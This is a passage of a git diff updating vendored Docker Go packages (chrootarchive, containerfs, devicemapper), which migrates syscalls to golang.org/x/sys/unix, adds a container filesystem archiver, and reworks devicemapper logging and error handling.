json.NewEncoder(w).Encode(options); err != nil { + w.Close() return fmt.Errorf("Untar json encode to pipe failed: %v", err) } w.Close() diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go index 0a500ed5c2..f2973132a3 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go index f9d7fed633..9802fad514 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go @@ -1,14 +1,14 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" "io/ioutil" "os" "path/filepath" - "syscall" "github.com/docker/docker/pkg/mount" rsystem "github.com/opencontainers/runc/libcontainer/system" + "golang.org/x/sys/unix" ) // chroot on linux uses pivot_root instead of chroot @@ -22,12 +22,17 @@ func chroot(path string) (err error) { if rsystem.RunningInUserNS() { return realChroot(path) } - if err := syscall.Unshare(syscall.CLONE_NEWNS); err != nil { + if err := unix.Unshare(unix.CLONE_NEWNS); err != nil { return fmt.Errorf("Error creating mount namespace before pivot: %v", err) } - // make everything in new ns private - if err := mount.MakeRPrivate("/"); err != nil { + // Make everything in new ns slave. + // Don't use `private` here as this could race where the mountns gets a + // reference to a mount and an unmount from the host does not propagate, + // which could potentially cause transient errors for other operations, + // even though this should be relatively small window here `slave` should + // not cause any problems. + if err := mount.MakeRSlave("/"); err != nil { return err } @@ -47,7 +52,7 @@ func chroot(path string) (err error) { defer func() { if mounted { // make sure pivotDir is not mounted before we try to remove it - if errCleanup := syscall.Unmount(pivotDir, syscall.MNT_DETACH); errCleanup != nil { + if errCleanup := unix.Unmount(pivotDir, unix.MNT_DETACH); errCleanup != nil { if err == nil { err = errCleanup } @@ -66,7 +71,7 @@ func chroot(path string) (err error) { } }() - if err := syscall.PivotRoot(path, pivotDir); err != nil { + if err := unix.PivotRoot(path, pivotDir); err != nil { // If pivot fails, fall back to the normal chroot after cleaning up temp dir if err := os.Remove(pivotDir); err != nil { return fmt.Errorf("Error cleaning up after failed pivot: %v", err) @@ -79,17 +84,17 @@ func chroot(path string) (err error) { // This dir contains the rootfs of the caller, which we need to remove so it is not visible during extraction pivotDir = filepath.Join("/", filepath.Base(pivotDir)) - if err := syscall.Chdir("/"); err != nil { + if err := unix.Chdir("/"); err != nil { return fmt.Errorf("Error changing to new root: %v", err) } // Make the pivotDir (where the old root lives) private so it can be unmounted without propagating to the host - if err := syscall.Mount("", pivotDir, "", syscall.MS_PRIVATE|syscall.MS_REC, ""); err != nil { + if err := unix.Mount("", pivotDir, "", unix.MS_PRIVATE|unix.MS_REC, ""); err != nil { return fmt.Errorf("Error making old root private after pivot: %v", err) } // Now unmount the old root so it's no longer visible from the new root - if err := syscall.Unmount(pivotDir, syscall.MNT_DETACH); err != nil { + if err := unix.Unmount(pivotDir, unix.MNT_DETACH); err != nil { return fmt.Errorf("Error while unmounting old root after pivot: %v", err) } mounted = false @@ -98,10 +103,10 @@ func chroot(path string) (err error) { } func realChroot(path string) error { - if err := syscall.Chroot(path); err != nil { + if err := unix.Chroot(path); err != nil { return fmt.Errorf("Error after fallback to chroot: %v", err) } - if err := syscall.Chdir("/"); err != nil { + if err := unix.Chdir("/"); err != nil { return fmt.Errorf("Error changing to new root after chroot: %v", err) } return nil diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go index 16354bf648..9a1ee58754 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go @@ -1,12 +1,12 @@ // +build !windows,!linux -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" -import "syscall" +import "golang.org/x/sys/unix" func chroot(path string) error { - if err := syscall.Chroot(path); err != nil { + if err := unix.Chroot(path); err != nil { return err } - return syscall.Chdir("/") + return unix.Chdir("/") } diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go index 49acad79ff..7712cc17c8 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go index eb0aacc3ab..d96a09f8fa 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go @@ -1,6 +1,6 @@ //+build !windows -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "bytes" @@ -29,7 +29,7 @@ type applyLayerResponse struct { func applyLayer() { var ( - tmpDir = "" + tmpDir string err error options *archive.TarOptions ) diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go index 9dd9988de0..8f3f3a4a8a 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" @@ -38,7 +38,7 @@ func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions s, err := archive.UnpackLayer(dest, layer, nil) os.RemoveAll(tmpDir) if err != nil { - return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s", err, dest) + return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s: %s", layer, dest, err) } return s, nil diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go index 4f637f17b8..a15e4bb83c 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go @@ -1,6 +1,6 @@ // +build !windows -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go index fa17c9bf83..15ed874e77 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" func init() { } diff --git a/vendor/github.com/docker/docker/pkg/containerfs/archiver.go b/vendor/github.com/docker/docker/pkg/containerfs/archiver.go new file mode 100644 index 0000000000..1fb7ff7bdc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/containerfs/archiver.go @@ -0,0 +1,203 @@ +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import ( + "archive/tar" + "fmt" + "io" + "os" + "path/filepath" + "time" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" +) + +// TarFunc provides a function definition for a custom Tar function +type TarFunc func(string, *archive.TarOptions) (io.ReadCloser, error) + +// UntarFunc provides a function definition for a custom Untar function +type UntarFunc func(io.Reader, string, *archive.TarOptions) error + +// Archiver provides a similar implementation of the archive.Archiver package with the rootfs abstraction +type Archiver struct { + SrcDriver Driver + DstDriver Driver + Tar TarFunc + Untar UntarFunc + IDMappingsVar *idtools.IDMappings +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func (archiver *Archiver) TarUntar(src, dst string) error { + logrus.Debugf("TarUntar(%s %s)", src, dst) + tarArchive, err := archiver.Tar(src, &archive.TarOptions{Compression: archive.Uncompressed}) + if err != nil { + return err + } + defer tarArchive.Close() + options := &archive.TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), + } + return archiver.Untar(tarArchive, dst, options) +} + +// UntarPath untar a file from path to a destination, src is the source tar file path. +func (archiver *Archiver) UntarPath(src, dst string) error { + tarArchive, err := archiver.SrcDriver.Open(src) + if err != nil { + return err + } + defer tarArchive.Close() + options := &archive.TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), + } + return archiver.Untar(tarArchive, dst, options) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. +func (archiver *Archiver) CopyWithTar(src, dst string) error { + srcSt, err := archiver.SrcDriver.Stat(src) + if err != nil { + return err + } + if !srcSt.IsDir() { + return archiver.CopyFileWithTar(src, dst) + } + + // if this archiver is set up with ID mapping we need to create + // the new destination directory with the remapped root UID/GID pair + // as owner + rootIDs := archiver.IDMappingsVar.RootPair() + // Create dst, copy src's content into it + if err := idtools.MkdirAllAndChownNew(dst, 0755, rootIDs); err != nil { + return err + } + logrus.Debugf("Calling TarUntar(%s, %s)", src, dst) + return archiver.TarUntar(src, dst) +} + +// CopyFileWithTar emulates the behavior of the 'cp' command-line +// for a single file. It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { + logrus.Debugf("CopyFileWithTar(%s, %s)", src, dst) + srcDriver := archiver.SrcDriver + dstDriver := archiver.DstDriver + + srcSt, err := srcDriver.Stat(src) + if err != nil { + return err + } + + if srcSt.IsDir() { + return fmt.Errorf("Can't copy a directory") + } + + // Clean up the trailing slash. This must be done in an operating + // system specific manner. + if dst[len(dst)-1] == dstDriver.Separator() { + dst = dstDriver.Join(dst, srcDriver.Base(src)) + } + + // The original call was system.MkdirAll, which is just + // os.MkdirAll on not-Windows and changed for Windows. + if dstDriver.OS() == "windows" { + // Now we are WCOW + if err := system.MkdirAll(filepath.Dir(dst), 0700, ""); err != nil { + return err + } + } else { + // We can just use the driver.MkdirAll function + if err := dstDriver.MkdirAll(dstDriver.Dir(dst), 0700); err != nil { + return err + } + } + + r, w := io.Pipe() + errC := make(chan error, 1) + + go func() { + defer close(errC) + errC <- func() error { + defer w.Close() + + srcF, err := srcDriver.Open(src) + if err != nil { + return err + } + defer srcF.Close() + + hdr, err := tar.FileInfoHeader(srcSt, "") + if err != nil { + return err + } + hdr.Format = tar.FormatPAX + hdr.ModTime = hdr.ModTime.Truncate(time.Second) + hdr.AccessTime = time.Time{} + hdr.ChangeTime = time.Time{} + hdr.Name = dstDriver.Base(dst) + if dstDriver.OS() == "windows" { + hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + } else { + hdr.Mode = int64(os.FileMode(hdr.Mode)) + } + + if err := remapIDs(archiver.IDMappingsVar, hdr); err != nil { + return err + } + + tw := tar.NewWriter(w) + defer tw.Close() + if err := tw.WriteHeader(hdr); err != nil { + return err + } + if _, err := io.Copy(tw, srcF); err != nil { + return err + } + return nil + }() + }() + defer func() { + if er := <-errC; err == nil && er != nil { + err = er + } + }() + + err = archiver.Untar(r, dstDriver.Dir(dst), nil) + if err != nil { + r.CloseWithError(err) + } + return err +} + +// IDMappings returns the IDMappings of the archiver. +func (archiver *Archiver) IDMappings() *idtools.IDMappings { + return archiver.IDMappingsVar +} + +func remapIDs(idMappings *idtools.IDMappings, hdr *tar.Header) error { + ids, err := idMappings.ToHost(idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid}) + hdr.Uid, hdr.Gid = ids.UID, ids.GID + return err +} + +// chmodTarEntry is used to adjust the file permissions used in tar header based +// on the platform the archival is done. +func chmodTarEntry(perm os.FileMode) os.FileMode { + //perm &= 0755 // this 0-ed out tar flags (like link, regular file, directory marker etc.) + permPart := perm & os.ModePerm + noPermPart := perm &^ os.ModePerm + // Add the x bit: make everything +x from windows + permPart |= 0111 + permPart &= 0755 + + return noPermPart | permPart +} diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go new file mode 100644 index 0000000000..7bb1d8c369 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go @@ -0,0 +1,87 @@ +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import ( + "path/filepath" + "runtime" + + "github.com/containerd/continuity/driver" + "github.com/containerd/continuity/pathdriver" + "github.com/docker/docker/pkg/symlink" +) + +// ContainerFS is that represents a root file system +type ContainerFS interface { + // Path returns the path to the root. Note that this may not exist + // on the local system, so the continuity operations must be used + Path() string + + // ResolveScopedPath evaluates the given path scoped to the root. + // For example, if root=/a, and path=/b/c, then this function would return /a/b/c. + // If rawPath is true, then the function will not preform any modifications + // before path resolution. Otherwise, the function will clean the given path + // by making it an absolute path. + ResolveScopedPath(path string, rawPath bool) (string, error) + + Driver +} + +// Driver combines both continuity's Driver and PathDriver interfaces with a Platform +// field to determine the OS. +type Driver interface { + // OS returns the OS where the rootfs is located. Essentially, + // runtime.GOOS for everything aside from LCOW, which is "linux" + OS() string + + // Architecture returns the hardware architecture where the + // container is located. + Architecture() string + + // Driver & PathDriver provide methods to manipulate files & paths + driver.Driver + pathdriver.PathDriver +} + +// NewLocalContainerFS is a helper function to implement daemon's Mount interface +// when the graphdriver mount point is a local path on the machine. +func NewLocalContainerFS(path string) ContainerFS { + return &local{ + path: path, + Driver: driver.LocalDriver, + PathDriver: pathdriver.LocalPathDriver, + } +} + +// NewLocalDriver provides file and path drivers for a local file system. They are +// essentially a wrapper around the `os` and `filepath` functions. +func NewLocalDriver() Driver { + return &local{ + Driver: driver.LocalDriver, + PathDriver: pathdriver.LocalPathDriver, + } +} + +type local struct { + path string + driver.Driver + pathdriver.PathDriver +} + +func (l *local) Path() string { + return l.path +} + +func (l *local) ResolveScopedPath(path string, rawPath bool) (string, error) { + cleanedPath := path + if !rawPath { + cleanedPath = cleanScopedPath(path) + } + return symlink.FollowSymlinkInScope(filepath.Join(l.path, cleanedPath), l.path) +} + +func (l *local) OS() string { + return runtime.GOOS +} + +func (l *local) Architecture() string { + return runtime.GOARCH +} diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go new file mode 100644 index 0000000000..6a99459517 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_unix.go @@ -0,0 +1,10 @@ +// +build !windows + +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import "path/filepath" + +// cleanScopedPath preappends a to combine with a mnt path. +func cleanScopedPath(path string) string { + return filepath.Join(string(filepath.Separator), path) +} diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go new file mode 100644 index 0000000000..9fb7084628 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs_windows.go @@ -0,0 +1,15 @@ +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import "path/filepath" + +// cleanScopedPath removes the C:\ syntax, and prepares to combine +// with a volume path +func cleanScopedPath(path string) string { + if len(path) >= 2 { + c := path[0] + if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') { + path = path[2:] + } + } + return filepath.Join(string(filepath.Separator), path) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go index 94b55306f1..63243637a7 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go @@ -1,23 +1,20 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" import ( "errors" "fmt" "os" "runtime" - "syscall" "unsafe" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) -// DevmapperLogger defines methods for logging with devicemapper. -type DevmapperLogger interface { - DMLog(level int, file string, line int, dmError int, message string) -} - +// Same as DM_DEVICE_* enum values from libdevmapper.h +// nolint: deadcode const ( deviceCreate TaskType = iota deviceReload @@ -70,12 +67,14 @@ var ( ErrBusy = errors.New("Device is Busy") ErrDeviceIDExists = errors.New("Device Id Exists") ErrEnxio = errors.New("No such device or address") + ErrEnoData = errors.New("No data available") ) var ( - dmSawBusy bool - dmSawExist bool - dmSawEnxio bool // No Such Device or Address + dmSawBusy bool + dmSawExist bool + dmSawEnxio bool // No Such Device or Address + dmSawEnoData bool // No data available ) type ( @@ -155,6 +154,7 @@ func (t *Task) run() error { if res := DmTaskRun(t.unmanaged); res != 1 { return ErrTaskRun } + runtime.KeepAlive(t) return nil } @@ -257,25 +257,12 @@ func (t *Task) getNextTarget(next unsafe.Pointer) (nextPtr unsafe.Pointer, start // UdevWait waits for any processes that are waiting for udev to complete the specified cookie. func UdevWait(cookie *uint) error { if res := DmUdevWait(*cookie); res != 1 { - logrus.Debugf("devicemapper: Failed to wait on udev cookie %d", *cookie) + logrus.Debugf("devicemapper: Failed to wait on udev cookie %d, %d", *cookie, res) return ErrUdevWait } return nil } -// LogInitVerbose is an interface to initialize the verbose logger for the device mapper library. -func LogInitVerbose(level int) { - DmLogInitVerbose(level) -} - -var dmLogger DevmapperLogger - -// LogInit initializes the logger for the device mapper library. -func LogInit(logger DevmapperLogger) { - dmLogger = logger - LogWithErrnoInit() -} - // SetDevDir sets the dev folder for the device mapper library (usually /dev). func SetDevDir(dir string) error { if res := DmSetDevDir(dir); res != 1 { @@ -328,17 +315,21 @@ func RemoveDevice(name string) error { return err } - var cookie uint - if err := task.setCookie(&cookie, 0); err != nil { + cookie := new(uint) + if err := task.setCookie(cookie, 0); err != nil { return fmt.Errorf("devicemapper: Can not set cookie: %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) dmSawBusy = false // reset before the task is run + dmSawEnxio = false if err = task.run(); err != nil { if dmSawBusy { return ErrBusy } + if dmSawEnxio { + return ErrEnxio + } return fmt.Errorf("devicemapper: Error running RemoveDevice %s", err) } @@ -361,10 +352,9 @@ func RemoveDeviceDeferred(name string) error { // set a task cookie and disable library fallback, or else libdevmapper will // disable udev dm rules and delete the symlink under /dev/mapper by itself, // even if the removal is deferred by the kernel. - var cookie uint - var flags uint16 - flags = DmUdevDisableLibraryFallback - if err := task.setCookie(&cookie, flags); err != nil { + cookie := new(uint) + flags := uint16(DmUdevDisableLibraryFallback) + if err := task.setCookie(cookie, flags); err != nil { return fmt.Errorf("devicemapper: Can not set cookie: %s", err) } @@ -372,14 +362,18 @@ func RemoveDeviceDeferred(name string) error { // semaphores created in `task.setCookie` will be cleaned up in `UdevWait`. // So these two function call must come in pairs, otherwise semaphores will // be leaked, and the limit of number of semaphores defined in `/proc/sys/kernel/sem` - // will be reached, which will eventually make all follwing calls to 'task.SetCookie' + // will be reached, which will eventually make all following calls to 'task.SetCookie' // fail. // this call will not wait for the deferred removal's final executing, since no // udev event will be generated, and the semaphore's value will not be incremented // by udev, what UdevWait is just cleaning up the semaphore. - defer UdevWait(&cookie) + defer UdevWait(cookie) + dmSawEnxio = false if err = task.run(); err != nil { + if dmSawEnxio { + return ErrEnxio + } return fmt.Errorf("devicemapper: Error running RemoveDeviceDeferred %s", err) } @@ -448,7 +442,7 @@ func BlockDeviceDiscard(path string) error { // Without this sometimes the remove of the device that happens after // discard fails with EBUSY. - syscall.Sync() + unix.Sync() return nil } @@ -471,13 +465,12 @@ func CreatePool(poolName string, dataFile, metadataFile *os.File, poolBlockSize return fmt.Errorf("devicemapper: Can't add target %s", err) } - var cookie uint - var flags uint16 - flags = DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag - if err := task.setCookie(&cookie, flags); err != nil { + cookie := new(uint) + flags := uint16(DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag) + if err := task.setCookie(cookie, flags); err != nil { return fmt.Errorf("devicemapper: Can't set cookie %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) if err := task.run(); err != nil { return fmt.Errorf("devicemapper: Error running deviceCreate (CreatePool) %s", err) @@ -505,7 +498,7 @@ func ReloadPool(poolName string, dataFile, metadataFile *os.File, poolBlockSize } if err := task.run(); err != nil { - return fmt.Errorf("devicemapper: Error running deviceCreate %s", err) + return fmt.Errorf("devicemapper: Error running ReloadPool %s", err) } return nil @@ -659,11 +652,11 @@ func ResumeDevice(name string) error { return err } - var cookie uint - if err := task.setCookie(&cookie, 0); err != nil { + cookie := new(uint) + if err := task.setCookie(cookie, 0); err != nil { return fmt.Errorf("devicemapper: Can't set cookie %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) if err := task.run(); err != nil { return fmt.Errorf("devicemapper: Error running deviceResume %s", err) @@ -717,10 +710,15 @@ func DeleteDevice(poolName string, deviceID int) error { } dmSawBusy = false + dmSawEnoData = false if err := task.run(); err != nil { if dmSawBusy { return ErrBusy } + if dmSawEnoData { + logrus.Debugf("devicemapper: Device(id: %d) from pool(%s) does not exist", deviceID, poolName) + return nil + } return fmt.Errorf("devicemapper: Error running DeleteDevice %s", err) } return nil @@ -757,12 +755,12 @@ func activateDevice(poolName string, name string, deviceID int, size uint64, ext return fmt.Errorf("devicemapper: Can't add node %s", err) } - var cookie uint - if err := task.setCookie(&cookie, 0); err != nil { + cookie := new(uint) + if err := task.setCookie(cookie, 0); err != nil { return fmt.Errorf("devicemapper: Can't set cookie %s", err) } - defer UdevWait(&cookie) + defer UdevWait(cookie) if err := task.run(); err != nil { return fmt.Errorf("devicemapper: Error running deviceCreate (ActivateDevice) %s", err) @@ -792,7 +790,7 @@ func CreateSnapDeviceRaw(poolName string, deviceID int, baseDeviceID int) error if dmSawExist { return ErrDeviceIDExists } - return fmt.Errorf("devicemapper: Error running deviceCreate (createSnapDevice) %s", err) + return fmt.Errorf("devicemapper: Error running deviceCreate (CreateSnapDeviceRaw) %s", err) } return nil diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go index 8477e36fec..5a5773d44f 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go @@ -1,21 +1,49 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" import "C" import ( + "fmt" "strings" + + "github.com/sirupsen/logrus" ) +// DevmapperLogger defines methods required to register as a callback for +// logging events received from devicemapper. Note that devicemapper will send +// *all* logs regardless to callbacks (including debug logs) so it's +// recommended to not spam the console with the outputs. +type DevmapperLogger interface { + // DMLog is the logging callback containing all of the information from + // devicemapper. The interface is identical to the C libdm counterpart. + DMLog(level int, file string, line int, dmError int, message string) +} + +// dmLogger is the current logger in use that is being forwarded our messages. +var dmLogger DevmapperLogger + +// LogInit changes the logging callback called after processing libdm logs for +// error message information. The default logger simply forwards all logs to +// logrus. Calling LogInit(nil) disables the calling of callbacks. +func LogInit(logger DevmapperLogger) { + dmLogger = logger +} + // Due to the way cgo works this has to be in a separate file, as devmapper.go has // definitions in the cgo block, which is incompatible with using "//export" -// DevmapperLogCallback exports the devmapper log callback for cgo. +// DevmapperLogCallback exports the devmapper log callback for cgo. Note that +// because we are using callbacks, this function will be called for *every* log +// in libdm (even debug ones because there's no way of setting the verbosity +// level for an external logging callback). //export DevmapperLogCallback -func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass C.int, message *C.char) { +func DevmapperLogCallback(level C.int, file *C.char, line, dmErrnoOrClass C.int, message *C.char) { msg := C.GoString(message) - if level < 7 { + + // Track what errno libdm saw, because the library only gives us 0 or 1. + if level < LogLevelDebug { if strings.Contains(msg, "busy") { dmSawBusy = true } @@ -27,9 +55,70 @@ func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass if strings.Contains(msg, "No such device or address") { dmSawEnxio = true } + if strings.Contains(msg, "No data available") { + dmSawEnoData = true + } } if dmLogger != nil { dmLogger.DMLog(int(level), C.GoString(file), int(line), int(dmErrnoOrClass), msg) } } + +// DefaultLogger is the default logger used by pkg/devicemapper. It forwards +// all logs that are of higher or equal priority to the given level to the +// corresponding logrus level. +type DefaultLogger struct { + // Level corresponds to the highest libdm level that will be forwarded to + // logrus. In order to change this, register a new DefaultLogger. + Level int +} + +// DMLog is the logging callback containing all of the information from +// devicemapper. The interface is identical to the C libdm counterpart. +func (l DefaultLogger) DMLog(level int, file string, line, dmError int, message string) { + if level <= l.Level { + // Forward the log to the correct logrus level, if allowed by dmLogLevel. + logMsg := fmt.Sprintf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) + switch level { + case LogLevelFatal, LogLevelErr: + logrus.Error(logMsg) + case LogLevelWarn: + logrus.Warn(logMsg) + case LogLevelNotice, LogLevelInfo: + logrus.Info(logMsg) + case LogLevelDebug: + logrus.Debug(logMsg) + default: + // Don't drop any "unknown" levels. + logrus.Info(logMsg) + } + } +} + +// registerLogCallback registers our own logging callback function for libdm +// (which is DevmapperLogCallback). +// +// Because libdm only gives us {0,1} error codes we need to parse the logs +// produced by libdm (to set dmSawBusy and so on). Note that by registering a +// callback using DevmapperLogCallback, libdm will no longer output logs to +// stderr so we have to log everything ourselves. None of this handling is +// optional because we depend on log callbacks to parse the logs, and if we +// don't forward the log information we'll be in a lot of trouble when +// debugging things. +func registerLogCallback() { + LogWithErrnoInit() +} + +func init() { + // Use the default logger by default. We only allow LogLevelFatal by + // default, because internally we mask a lot of libdm errors by retrying + // and similar tricks. Also, libdm is very chatty and we don't want to + // worry users for no reason. + dmLogger = DefaultLogger{ + Level: LogLevelFatal, + } + + // Register as early as possible so we don't miss anything. + registerLogCallback() +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go index 91fbc85b3a..0b88f49695 100644 --- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go @@ -1,9 +1,9 @@ -// +build linux +// +build linux,cgo -package devicemapper +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" /* -#cgo LDFLAGS: -L. -ldevmapper +#define _GNU_SOURCE #include #include // FIXME: present only for BLKGETSIZE64, maybe we can remove it? @@ -12,19 +12,25 @@ extern void DevmapperLogCallback(int level, char *file, int line, int dm_errno_o static void log_cb(int level, const char *file, int line, int dm_errno_or_class, const char *f, ...) { - char buffer[256]; - va_list ap; - - va_start(ap, f); - vsnprintf(buffer, 256, f, ap); - va_end(ap); + char *buffer = NULL; + va_list ap; + int ret; + + va_start(ap, f); + ret = vasprintf(&buffer, f, ap); + va_end(ap); + if (ret < 0) { + // memory allocation failed -- should never happen? + return; + } - DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer); + DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer); + free(buffer); } static void log_with_errno_init() { - dm_log_with_errno_init(log_cb); + dm_log_with_errno_init(log_cb); } */ import "C" @@ -56,7 +62,6 @@ const ( var ( DmGetLibraryVersion = dmGetLibraryVersionFct DmGetNextTarget = dmGetNextTargetFct - DmLogInitVerbose = dmLogInitVerboseFct DmSetDevDir = dmSetDevDirFct DmTaskAddTarget = dmTaskAddTargetFct DmTaskCreate = dmTaskCreateFct @@ -211,7 +216,7 @@ func dmGetNextTargetFct(task *cdmTask, next unsafe.Pointer, start, length *uint6 } func dmUdevSetSyncSupportFct(syncWithUdev int) { - (C.dm_udev_set_sync_support(C.int(syncWithUdev))) + C.dm_udev_set_sync_support(C.int(syncWithUdev)) } func dmUdevGetSyncSupportFct() int { @@ -226,10 +231,6 @@ func dmCookieSupportedFct() int { return int(C.dm_cookie_supported()) } -func dmLogInitVerboseFct(level int) { - C.dm_log_init_verbose(C.int(level)) -} - func logWithErrnoInitFct() { C.log_with_errno_init() } diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go new file mode 100644 index 0000000000..8a1098f7d5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go @@ -0,0 +1,6 @@ +// +build linux,cgo,!static_build + +package devicemapper // import "github.com/docker/docker/pkg/devicemapper" + +// #cgo pkg-config: devmapper +import "C" diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go similarity index 75% rename from vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go rename to vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go index dc361eab76..3d3021c4e1 100644 